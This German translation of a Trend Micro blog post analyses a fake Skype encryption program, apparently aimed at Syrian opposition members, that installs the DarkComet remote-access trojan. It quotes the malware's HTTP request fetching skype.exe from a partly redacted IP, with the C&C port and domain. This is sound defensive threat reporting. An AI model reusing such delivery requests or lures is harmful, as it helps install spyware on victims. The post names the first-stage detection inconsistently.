Falsche Skype-Verschlüsselungssoftware enthält Trojaner DarkComet

Originalartikel von Nart Villeneuve, Senior Threat Researcher

Das Internet spielt im anhaltenden Syrien-Konflikt eine interessante Rolle. Angriffe auf syrische Oppositionelle hatte es bereits im Februar gegeben, und immer wieder gibt es gezielte Phishing-Attacken via Facebook und YouTube. Ein CNN-Report berichtet nun über einen Schädling, der sich über Skype verbreitet.

Die Trend Micro Sicherheitsforscher haben eine Webseite entdeckt, die eine vermeintliche Verschlüsselungssoftware für Skype verbreitet. Die Seite wird in Syrien unter {BLOCKED}encription.sytes.net gehostet – auf demselben Server, der auch in vergangenen Angriffen als C & C-Server genutzt wurde. Auf der Webseite ist ein YouTube-Video eingebettet, das vorgibt, von „IT Security Lab“ zu kommen und die Skype-Kommunikation zu verschlüsseln.

Lädt ein Nutzer die Datei herunter, so erhält er das vermeintliche Verschlüsselungsprogramm Skype Encription v 2.1. Dahinter steckt jedoch BKDR_METEO.HVN.

Die Analyse der Datei lässt vermuten, dass “SyRiAnHaCkErS” die Autoren des Angriffs sind. Die Software generiert eine Verbindung:

GET /SkypeEncription/Download/skype.exe HTTP/1.1
Host: {BLOCKED}.{BLOCKED}.0.28
Connection: Keep-Alive

Die herunter geladene Datei skype.exe enthält den Schädling DarkComet Version 3.3 und nimmt Verbindung auf mit {BLOCKED}.{BLOCKED}.0.28 auf Port 771. Sobald BKDR_ZAPCHAST.HVN installiert ist, können die Angreifer mithilfe von DarkComet RAT die Kontrolle über das infizierte System übernehmen. Übrigens nutzt Skype für Anrufe, Video-Konferenzen und Instant Messages AES-Verschlüsselung.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

*